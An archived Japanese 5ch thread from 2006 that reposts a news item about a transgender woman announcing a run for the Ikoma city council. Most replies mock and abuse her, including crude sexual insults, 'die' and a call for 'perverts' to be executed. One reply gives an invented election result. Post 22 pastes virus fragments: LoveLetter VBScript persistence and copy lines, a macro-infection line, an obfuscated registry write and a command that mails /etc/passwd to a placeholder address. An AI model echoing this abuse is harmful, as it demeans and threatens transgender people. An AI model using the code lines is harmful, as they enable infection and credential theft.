5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

性同一性障害の「女性??」市議選に立候補表明

1 :かしわ餅φ ★:2006/12/24(日) 18:06:39 0
  心と体の性が一致しない性同一性障害(GID)と診断され、戸籍上の性別を女性に
変更するよう奈良家裁に申し立てた生駒市の派遣会社員森村さやかさん(46)=通称=
が22日、来年4月の統一地方選で実施される同市議選に立候補を表明した。
「GIDが原因で小中学校の頃にいじめを受けた経験を市の施策に生かしたい」と
話している。

  森村さんは公文書などから性別記載欄を削除するよう求める活動をしている。
市選管への立候補届け出の性別欄については「空欄で出す可能性もある」として
いる。

  森村さんは今年1月に性別適合手術を受けたが、過去に結婚して子どもがいるため
「性同一性障害特例法」が適用されず、性別変更が認められなかった。

asahi.com:性同一性障害の「女性」市議選に立候補表明 - マイタウン奈良
http://mytown.asahi.com/nara/news.php?k_id=30000000612230001

2 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:08:42 0
別に、性別がどちらであろうと立候補し当選することに異論はないが、
「GIDが原因で小中学校の頃にいじめを受けた経験を市の施策に生かしたい」
はいかがなもんかと思うがね。



3 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:12:45 0
記事にするほどのものか?

4 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:12:50 0
ちょっと待てぃ
大峰山のあいつが立候補だと?
奈良も終わるな・・

5 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:13:27 O
子供つくったくせに。
女に発情したくせに。

6 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:14:28 0
2に同意。こんなの今話題になってるいじめ問題に便乗しただけ。
自分もいじめにあってました、だからわかります?馬鹿じゃないだろうか。

あと、「過去に結婚して子どもがいる」って時点であたまおかしい。
無理やりレイプされて子種を拠出されたとかならわかるが、
普通にセクロスして射精してていまさら性転換など認めるかボケ!!

7 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:15:49 0
同じ当事者だが
生物学的異性と子供作ったり
特例法を受け入れずわがままを認めさせようとするバカは
絶対に認めない

8 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:21:21 0
大峰山女人禁制の開放を求める会 ホームページ
http://www.on-kaiho.com/index2.html

こいつ(森村)も活動している

9 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:21:31 0
あふぉ

10 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:24:08 0
日本の将来の為にも変質者は処刑すべきだ

11 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:25:27 0
森村さやか 得票数37 落

12 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:27:35 0
堂々と表舞台に出てくるなよ

13 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:27:37 0
「GIDが原因で小中学校の頃にいじめを受けた経験を市の施策に生かしたい」

無理です氏ね

14 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:30:59 O
こいつ、大峰山に強行登山したやつ?

逮捕されなかったの?

15 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:36:00 0
世田谷のあの人はよかった

16 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:41:11 0
性同一障害でいじめられた、なんてレアな経験が今のイジメ問題に役立つかどうか甚だ疑問である。

17 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:53:47 O
これで負けても差別だなんだと喚けるんだから。卑怯だよなあ。

18 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 18:55:19 0
個人の趣味嗜好にどうこう言うつもりは無いけど頼むから公の場に出てこないで
子供の教育上よろしくない

19 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:05:04 O
>>11
書類に必要事項が書いて無い時点でアウツ

20 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:05:09 0
奈良なら当選するかもなww

21 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:07:20 0
奈良ってひっこし~ひっこし~いまからひっこし~しばくぞ~の奈良ですか?

22 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:19:57 0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

23 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 19:31:12 0
また「森村さやか」か。ww
女装ツルベみたいなおっさんだろ?

24 :オレオレ!オレだよ、名無しだよ!!:2006/12/24(日) 20:58:10 0
大迫よりはマシかもな

25 :オレオレ!オレだよ、名無しだよ!!:2006/12/25(月) 22:11:28 0
犯罪に利用されないようにするならGDIに対しての戸籍変更もありだが、
その点をまず選挙公約で自分の考え述べてからだろ。

6 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)